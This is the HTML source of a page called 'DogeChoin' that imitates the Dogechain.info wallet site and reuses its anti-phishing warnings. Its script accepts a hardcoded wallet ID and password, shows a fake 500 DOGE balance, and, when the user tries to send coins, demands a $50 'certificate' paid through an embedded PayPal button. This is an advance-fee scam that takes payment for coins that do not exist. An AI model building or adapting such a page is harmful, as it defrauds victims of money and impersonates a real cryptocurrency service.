
<!-- programmer xnmap from maroc-->
<!DOCTYPE html>
<html>
  <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter&family=Lato:wght@300&family=Roboto:wght@300;400&family=Rubik+Moonrocks&display=swap" rel="stylesheet">





<meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <head>
    
    
    
    
    
    <style>
    *{
      margin: 0px;
    }

    .div{
      width:100%;
      height: 5600px;
      background-color: white;
    }
      .header1{
        z-index: 1;
        position: fixed;
        width: 100%;
        height: 100px;
        background-color:#F0F8FF;
      }
      .img{
        transform: translate(90%,30%);
        width: 60px;
      }
      
      .h1{
        transform: translate(4%,-110%);
        text-align: center;
      }
      .p{
        transform: translate(0%,-290%);
        font-size: 11px;
        text-align: center;
      }
      .button{
        font-family: 'Rubik Moonrocks', cursive;
        transform: translate(-56%,0%);
        float: right;
        border:0px;
        width: 19%;
        height: 34px;
        padding: 5px 5px;
        border-radius: 4px;
      background: linear-gradient(to right, #fe8c00, #f83600);
      }
      .main1{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 350px;
        background: linear-gradient(to right, #f2994a, #f2c94c);
      }
      .main2{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,2%);
        width: 80%;
        height: 570px;
        background: linear-gradient(to right, #fe8c00, #f83600);
      }
      .main3{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 350px;
        background: linear-gradient(to right, #8e2de2, #4a00e0);
      }
      .main4{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 350px;
        background: linear-gradient(to right, #8e2de2, #4a00e0);
      }
      .main5{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 350px;
        background: linear-gradient(to right, #8e2de2, #4a00e0);
      }
      .main6{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,12%);
        width: 80%;
        height: 120px;
        background: linear-gradient(to right, #fe8c00, #f83600);
      }
      .main7{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 300px;
        background: linear-gradient(to right, #8e2de2, #4a00e0);
      }
      .main8{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 300px;
        background: linear-gradient(to right, #8e2de2, #4a00e0);
      }
      .main9{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 300px;
        background: linear-gradient(to right, #8e2de2, #4a00e0);
      }
      .main10{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 350px;
        background: linear-gradient(to right, #8e2de2, #4a00e0);
      }
      .main11{
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 70px;
        background: linear-gradient(to right, #fe8c00, #f83600);
      }
      .main12{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 150px;
        background: linear-gradient(to right, #8e2de2, #4a00e0);
      }
       .main13{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 250px;
        background: linear-gradient(to right, #ece9e6, #ffffff);
      }
      .main14{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 250px;
        background: linear-gradient(to right, #8e2de2, #4a00e0);
      }
      .main15{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 250px;
        background: linear-gradient(to right, #ece9e6, #ffffff);
      }
      .main16{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 700px;
        background: linear-gradient(to right, #fe8c00, #f83600);
      }
      .main17{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 250px;
        background: linear-gradient(to right, #f2994a, #f2c94c);
      }
      .main18{
        box-shadow: rgba(17, 12, 46, 0.15) 0px 48px 100px 0px;
        border-radius: 4px;
        transform: translate(12%,5%);
        width: 80%;
        height: 250px;
        background: linear-gradient(to right, #ece9e6, #ffffff);
      }
    .main3 img{
      width: 40%;
      margin-left: 90px;
      margin-top: 30px;
    }
    .h-1{
      text-align: center;
    }
    .p-1{
      text-align: center;
    }
    .button-1{
      margin-top: 20px;
      color: white;
      border-radius: 5px;
      margin-left: 15px;
      width: 90%;
      border:0px;
      height: 40px;
      padding: 5px 5px;
      background: linear-gradient(to right, #e44d26, #f16529);
    }
    .hh1{
      margin-left: 30px;
      
      font-size: 40px;
    }
    .hh2{
      margin-left: 30px;
      font-size: 40px;
    }
    .hh3{
      margin-left: 30px;
      font-size: 40px;
    }
    .main1 h1{
      font-family: 'Rubik Moonrocks', cursive;
      color:white;
      transform: translate(0%,80%);
    }
    .main1 p{
      
      font-size:22px;
      margin: 8px;
      transform: translate(0%,200%);
      margin-left: 10%;
      color: #F0F8FF;
    }
    .main2 p{
      transform: translate(0%,90%);
      color: white;
      font-size: 13px;
      margin-left: 100%;
      margin:8px;
    }
    .main4 img{
      width: 40%;
      margin-left: 90px;
      margin-top: 30px;
    }
    .main4 button{
      margin-top: 20px;
      color: white;
      border-radius: 5px;
      margin-left: 15px;
      width: 90%;
      border:0px;
      height: 40px;
      padding: 5px 5px;
      background: linear-gradient(to right, #e44d26, #f16529);
    }
    .main4 p{
      text-align: center;
    }
    .main4 h1{
      text-align: center;
    }
    .main5 p{
      text-align: center;
    }
    .main5 h1{
      text-align: center;
    }
    .main5 button{
      margin-top: 20px;
      color: white;
      border-radius: 5px;
      margin-left: 15px;
      width: 90%;
      border:0px;
      height: 40px;
      padding: 5px 5px;
      background: linear-gradient(to right, #e44d26, #f16529);
    }
    .main5 img{
      width: 40%;
      margin-left: 90px;
      margin-top: 30px;
    }
    .main6 img{
      width: 16%;
      transform: translate(0%,60%);
      margin-left: 10%;
    }
    .main6 h1{
      text-align: center;
      transform: translate(0%,-50%);
      
    }
    .main7 h1{
      text-align: center;
    }
    .main7 p{
      text-align: center;
      margin: 8px;
    }
    .main7 img{
      width: 40%;
      margin-left: 90px;
      margin-top: 30px;
    }
    .main8 img{
      width: 40%;
      margin-left: 90px;
      margin-top: 30px;
    }
    .main8 h1{
      text-align: center;
    }
    .main8 p{
      text-align: center;
    font-size: 15px;
    }
    
    .main9 img{
      width: 40%;
      margin-left: 90px;
      margin-top: 30px;
    }
    .main9 h1{
      text-align: center;
    }
    .main9 p{
      text-align: center;
  margin: 2px;
    }
    .main10 h1{
      text-align: center;
    }
    .main10 p{
      text-align: center;
    }
    .main10 img{
      width: 40%;
      margin-left: 90px;
      margin-top: 30px;
    }
    .main11 h1{
      float: right;
      text-align: center;
      transform: translate(-16%,30%);
    
    }
    .main11 img{
      width: 22%;
    }
    .main12 h1{
      transform: translate(0%,20%);
      text-align: center;
    }
    .main12 p{
      transform: translate(0%,100%);
      text-align: center;
    }
    .main13 textarea{
      background-color: black;
      color: #7FFF00;
      width: 99%;
      height: 250px;
      outline: 0px;
      border:0px;
      border-radius: 5px;
    }
    .main14 h1{
      margin-bottom:30px;
      text-align: center;
      transform: translate(0%,28%);
    }
    .main14 p{
      transform: translate(0%,6%);
    
      text-align: center;
    }
    .main15 textarea{
      transform: translate(-2%,-2%);
      background-color: black;
      color: #7FFF00;
      width: 100%;
      height: 250px;
      outline: 0px;
      border:0px;
      border-radius: 5px;
      margin: 4px;
    }
    .main16 h1{
      text-align: center;
    
    }
    .main16 p{
      text-align: center;
    
    }
    .main16 hr{
      width: 99%;
      height: 1px;
      background-color: white;
    }
    .login{
    border-radius: 5px;
      width: 90%;
      height: 300px;
      background-color:white;
      transform: translate(5%,-30%);
    }
    
        .login1{
    border-radius: 5px;
      width: 90%;
      height: 650px;
      background-color:white;
      transform: translate(5%,-20%);
      
    }
     
    
    .header2{
      background-color: #0099ff;
      width: 100%;
      height: 40px;
    }
    .header2 p{
      transform: translate(5%,40%);
      color: white;
      
    }
    .header2 img{
      float: right;
      width: 6%;
      transform: translate(-16%,-40%);
      
    }
    .input{
      outline: 0px;
      padding: 5px 5px;
      margin-left: 30px;
      width: 80%;
      border: 3px solid #39c71c;
    }
    .input1{
      border-radius: 5px;
      outline: 0px;
      padding: 8px 8px;
      transform: translate(2%,0%);
      width: 90%;
      border: 1px solid black;
    margin:8px;
    }
    .colo{
      margin-left: 30px;
      color: #39c71c;
    }
    .login p{
      padding: 3px 3px;
      margin-left: 30px;
      font-size: 14px;
    }
    .open{
      opacity: 0.0;
    }
    .butt1{
      color: white;
      background-color: #0099ff;
      transform: translate(-11%,200%);
      border-radius: 4px;
      border: 0px;
      padding: 7px 5px;
      float:right;
      margin: 4px;
      width: 80px;
      
    }
    .butt2{
      
      transform: translate(-11%,200%);
      border-radius: 4px;
      border: 0px;
      padding: 7px 5px;
      margin: 4px;
      float: right;
      width: 80px;
    }
    .hr{
      
      background-color: black;
      border: 1px;
      width: 100%;
      height: 1px
    }
    .show{
      transform: translate(4%,10%);
      width: 90%;
      border: 0px;
      padding: 8px 8px;
      margin: 5px;
      border-radius: 5px;
      background-color:white;
      color:#0099ff;
    }
    .show:hover{
      transform: translate(4%,10%);
      width: 90%;
      border: 0px;
      padding: 8px 8px;
      margin: 5px;
      border-radius: 5px;
      
      background-color: #0099ff;
      color: white;
    }
    .send{
      transform: translate(6%,0%);
      width: 90%;
      height: 200px;
      background-color: white;
    }
    .send1{
      float: right;
      color: white;
      background-color:  #0099ff;
      border-radius: 4px;
      border: 0px;
      padding: 4px 4px;
      margin: 4px;
      width: 30%;
      height: 33px;
    }
    .button3{
      font-size: 10px;
      color: white;
      background-color:  #0099ff;
      border-radius: 4px;
      border: 0px;
      padding: 7px 5px;
      margin: 4px;
      width: 77px;
      float: right;
      transform: translate(140%,330%);
    }
    .button4{
      transform: translate(140%,280%);
      color: black;
      background-color:#f8fcff;
      border-radius: 4px;
      border: 0px;
      padding: 7px 5px;
      margin: 4px;
      width: 80px;
      float: right;
    }
    .send h1{
      transform: translate(0%,250%);
      text-align: center;
      font-size: 20px;
    }
    .d{
      margin-left: 7px;
      font-size: 20px;
    }
    .pp{
      transform: translate(2%,-10%);
      color: white;
      width: 98%;
      height: 36px;
      background-color: #f1f8ff;
    }
    .input3{
      border-radius: 5px;
      outline: 0px;
      padding: 8px 8px;
      transform: translate(2%,-10%);
      width:52%;
      border: 1px solid black;
    margin:5px;
    }
    
    
    .ppp{
      transform: translate(2%,-10%);
       color: black;
    border: 0px;
      height: 30px;
      width: 19%;
      background-color: #f1f8ff;
      padding: 8px 8px;
    }
    .md{
      padding: 8px 8px;
      transform: translate(2%,-10%);
       color: black;
    border: 0px;
      height: 30px;
      width: 19%;
      background-color: #f1f8ff;
    }
    .h1{
      font-family: 'Rubik Moonrocks', cursive;
    }
    .card{
      border-radius: 10px;
      transform: translate(0%,-170%);
      width: 100%;
      height: 350px;
      background-color: white;
      border: 2px solid red;
    }
    .card p{
      text-align: center;
      margin: 4px;
      color: #6495ED;
    }
    .n{
      opacity: 0.0;
      
    }
    .FF{
      width: 40%;
      transform: translate(80%,0%)
    }
    .paypal-not{
      transform: translate(44%,0%);
      width: 50%;
      height:10px ;
      
    }
    .hover1{
      width: 100%;
      height: 200px;
    
    }
    .hover1:hover{
      width: 100%;
      height: 200px;
      transform: translate(0%,-60%);
    }
    #FF{
      width: 30%;
      transform: translate(80%,0%)
    }
    
    </style>
    <title>dogeChoin</title>
  </head>
  <body>
    <header class="header1">
      <img class="img" src="img.png"/>
      <h1 class="h1">DogeChoin</h1>
      <p class="p">Dogecoin Blockchain Explorer</p>
    
       <details>
           <summary class="open" id="open"></summary>
           <div class="login">
             <header class="header2"><p>Open Wallet</p><img onclick="document.getElementById('open').click()" class="1" src="x.png"></header>
             <br>
             <p class="colo">Wallet ID</p>
           <input value="4e9387b8-17e6-9a61-a61a-e548868e4091" id="input" type="text" class="input" placeholder="xxxxx.xxxxxx.xxxxxxxxxxxxxx">
           <br>
           <br>
           <p>By using this website, you accept the <a href="x">user</a></p>
           <a href="x"><p>agreement</p></a>
           <p>and acknowledge to have read the.privacy policy.</p>
           
           <hr class="hr">
           <button onclick="xnmap()" class="butt1" type="submit">Proceed</button>
           <button  class="butt2" type="button">Cancel</button>
           </div>
         </details>
                <details>
           <summary class="open" id="yes"></summary>
           <div class="login">
             <header class="header2"><p>Open Wallet</p><img onclick="document.getElementById('yes').click()" class="1" src="x.png"></header>
             <br>
             <p>Please enter the password to decrypt your wallet.</p>
              <p class="colo">Wallet ID</p>
           <input id="input" type="text" class="input1" value="4e9387b8-17e6-9a61-a61a-e548868e4091">
           <br>
             <input value="testxnmap" id="input3" id="input" type="password" class="input1" placeholder="password">
             
             <hr class="hr">
              <button onclick="xnmap2()" class="butt1" type="submit">Proceed</button>
           <button  class="butt2" type="button">Cancel</button>
           <br>
           <br>
<script>
  function xnmap2(){
    document.getElementById("yes").click();
    input = document.getElementById("input3").value;
    if(input=="testxnmap"){
      document.getElementById("oky").click();
    }
  }
</script>
           

         </details>
         
         
                         <details>
           <summary class="open" id="oky"></summary>
           <div class="login1">
            <img id="FF" class="FF" src="">
            <button class="show">send</button>
            <br>
            <button class="show">Receive</button>
             <br>
            <button class="show">Transactions</button>
             <br>
            <button class="show">Private Keys</button>
            <div class="send">
              <h1>Balance</h1>
              <h1>500.00</h1>
            </div>
             <div class="hover1">
            <h1 class="d">Destination</h1>
           <input  id="input" type="text" class="input1" value="" placeholder="Dogecoin address">
           <br>
          
           <h1 class="d">Amount</h1>
             <p class="pp"><button class="md"> DOGE</button><input  id="input" type="tel" class="input3" placeholder="0.00000000"><button class="ppp">MAX</button></p>
             <button id="f" onclick="F()" class="send1">send Dogecoin</button>
             
            <br>
              <button onclick="xnmap1()" class="button3" type="submit">Refresh Data</button>
           <button onclick="document.getElementById('oky').click()" class="button4" type="button">Cancel</button>
           <br>
           <br>
</div>
           
<details>
  <summary class="n" id="card"></summary>
  <div class="card">
    <br>
    <img class="FF" src="F.png">
    <p>You have to get a certificate first.</p>
    
    <p>The price of the certificate is.  50$</p>
    
    <p>You can buy it via Paypal.</p>
    
    <div class="paypal-not">
       <script src="https://www.paypal.com/sdk/js?client-id=AT1VgNW68VxmAsxDeYjqxdCERgVSQDAcm0__2ppm3-y9Jsl-iiIu-Yv1YymsyIxIuqNuGoIG55oi6cuY"></script>
    <!-- Set up a container element for the button -->
    <div id="paypal-button-container"></div>
    <script>
      paypal.Buttons({
        // Sets up the transaction when a payment button is clicked
        createOrder: (data, actions) => {
          return actions.order.create({
            purchase_units: [{
              amount: {
                value: '50.00' // Can also reference a variable or function
              }
            }]
          });
        },
        // Finalize the transaction after payer approval
        onApprove: (data, actions) => {
          return actions.order.capture().then(function(orderData) {
            // Successful capture! For dev/demo purposes:
            console.log('Capture result', orderData, JSON.stringify(orderData, null, 2));
            const transaction = orderData.purchase_units[0].payments.captures[0];
            alert(`Transaction ${transaction.status}: ${transaction.id}\n\nSee console for all available details`);
            document.getElementById("FF").innerHTML="<img src='F.png'>";
            // When ready to go live, remove the alert and show a success message within this page. For example:
            // const element = document.getElementById('paypal-button-container');
         //    element.innerHTML = '<h3>Thank you for your payment!</h3>';
            // Or go to another URL:  actions.redirect('thank_you.html');
          });
        }
      }).render('#paypal-button-container');
      
    </script>
    </div>
  </div>
</details>
         </details>
      <script>
        function F(){
          document.getElementById("card").click();
        }
      </script>
      
        <script>
          function xnmap(){
            login = document.getElementById("input").value;
            if(login=="4e9387b8-17e6-9a61-a61a-e548868e4091"){
              document.getElementById("open").click();
              document.getElementById("yes").click();
            }else{
              alert("not");
            }
          }
        </script>
    </header>

    <div class="div">
      <br>
      <br>
      <br>
      <br>
      <br>
      <br>
      <br>
      <br>
      <button class="button" type="button" class="button">< Back</button>
      
      <br>
      <main class="main1">
        <h1 class="hh1">Dogecoin</h1>
        <h1 class="hh2">Wallets Made</h1>
        <h1 class="hh3"> Easy</h1>
        <p>Our online wallet allows</p>
        <p>you to securely access</p>
        <p>your coins from all over</p>
        <p>the world.</p>
      </main>
      <br>
       <main class="main2">
         <p>BEWARE OF PHISHING SITES: Beware of</p>
         <p>websites masquerading as Dogechain.info.</p>
         <p>There is only one Dogechain, and it's at</p>
         <p>Dogechain.INFO. Any websites at other</p>
         <p>domains are phishing sites that intend to</p>
         <p>compromise your private keys that control</p>
         <p>your Dogecoin. Using your wallet ID,</p>
         <p>password, two-factor codes, private keys,</p>
         <p>etc. at any phishing site.will compromise</p>
         <p>your security and will likely result in loss of</p>
         <p>Dogecoin and your private keys..BE</p>
         <p>CAREFUL!</p>
         <br>
         <p>BEWARE OF BROWSER EXTENSIONS:</p>
         <p>Browser extensions/addons may contain</p>
         <p>malicious code designed to steal your</p>
         <p>wallet ID, password, two-factor codes,</p>
          <p>private keys, etc. For your safety, DO NOT</p>
           <p>access or use any sensitive data online if</p>
            <p>you have.any.browser extensions/addons</p>
             <p>installed.</p>
              <p>NO MOBILE APPS: Dogechain.info has.no</p>
               <p>other website.and.no mobile application.</p>
       </main>
      <br>
       <main class="main3">
         <img src="Log.png">
         <br>
         <h1 class="h-1">New Wallet</h1>
         <p class="p-1">Need a new wallet?</p>
         <a href="">
           <button  class="button-1" type="button">creatt wallet</button>
         </a>
       </main>
      <br>
    
       <main class="main4">
         <img src="creatt.png">
         <h1>Existing Wallet</h1>
         <p>Already have a wallet?</p>
         
           <button type="button" onclick="document.getElementById('open').click()">Login</button>
         
        
       </main>
      <br>
  
       <main class="main5">
                  <img src="wallet.png">
         <h1>Paper Wallet</h1>
         <p>Sweep coins from a private key</p>
         <a href="">
           <button  type="button">Sweep Coins</button>
         </a>
       </main>
      <br>
  
       <main class="main6">
         <img src="N.png"><h1>Features</h1>
       </main>
      <br>
       <main class="main7">
         <img src="G.png">
         <h1>Secure</h1>
         <p>All your data is stored encrypted and can</p>
         <p>only be decrypted with your password.</p>
       </main>
      <br>
       <main class="main8">
         <img src="orbes.png">
         <h1>Worldwide access</h1>
         <p>Going on a holiday or business trip? No</p>
         <p>problem, you can access your coins from all</p>
         <p>over the world.</p>
       </main>
      <br>
       <main class="main9">
         <img src="Brt.png">
         <h1>Privacy</h1>
         <p>We have no control over your wallet. You're</p>
         <p>100% in charge of your own wallet.</p>
       </main>
      <br>
       <main class="main10">
         <img src="like.png">
         <h1>Easy</h1>
         <p>We make it really easy for you to use your online wallet and perform various operations with it.</p>
         
       </main>
      <br>
       <main class="main11">
         <img src="work.png">
         <h1>How it works</h1>
       </main>
      <br>
       <main class="main12">
         <h1>Our wallets are simple text files</h1>
         <p>They look like the text you see below.</p>
       </main>
      <br>
       <main class="main13">
         <textarea>
           {
    [
        "guid": "e404a3b9-4fad-41ab-a05b-c5f27d7fd3d8",
        "sharedKey": "c384b33d-bd68-4ec7-987e-70021d0cdde2",
        "keys": [
            "addr": "DFZxfsuuxgw...F6P6Som2A",
            "priv": "6KBNoT9L843mb...63VXCay5takj"
        ]
    ]
}
         </textarea>
       </main>
      <br>
       <main class="main14">
         <h1>These files are encrypted in your browser</h1>
         <p>That's right, we only deal with stuff encrypted by your browser. We will never have access to your wallet! The encrypted text looks like the gibberish stuff you'll find below.</p>
       </main>
      <br>
       <main class="main15">
         
         <textarea>
           toJsK7x/aT/jHvrKjUMSKYrFIh6J+HQGUvDqThezJm1W+BlEW+79YDc5uBqJ6w6K57WCM6Vi+6ppRi6MUFzXwWrWhHkueAhVTc3OkWmDnCRQTq8yVFUCDL6sFlGHJT7368owzreFSsc8hB27ron4JfAqYD514QkAO1RQ1oEGk6uDWadssat4yf65htzHV3AtnUziJqTSbVcrqgA4bwKrp8eUVrIwESyMzipgNjLhg2mNj2EZsfRVbc8Lar8OWppIfWLFNyWpn7HpPIlL36ag8vCWfM725JYx83dDJYPnf+3Kpxf9uiaj4Qb3QhI8QxKFq861NNIVGvwSfpsGY61nJnJuTMFPBqZL5KkK/nw7aTvmSc928wvRtrO4D7/QBiUEURa/Fb33yfzqNbTGqmA43Q==
         </textarea>
       </main>
      <br>
       <main class="main16">
         <h1>The encrypted files are stored in the cloud</h1>
         <p>If all of our servers were to blow up simultaneously, you'd still have access to your wallet.</p>
      
      <br>
      <br>
      <hr>
         <h1>No need to synchronize the blockchain, we'll do that for you</h1>
         <p>Let us do all the hard work for you. Our API's will be used to broadcast transactions onto the network.</p>
    <br>
    <br>
    <hr>
         <h1>We never have access to your wallet</h1>
         <p>Only you are able to decrypt your wallet, this essentially means we'll never be able to touch your coins.</p>
       </main>
      <br>
    </div>
      
  </body>
</html>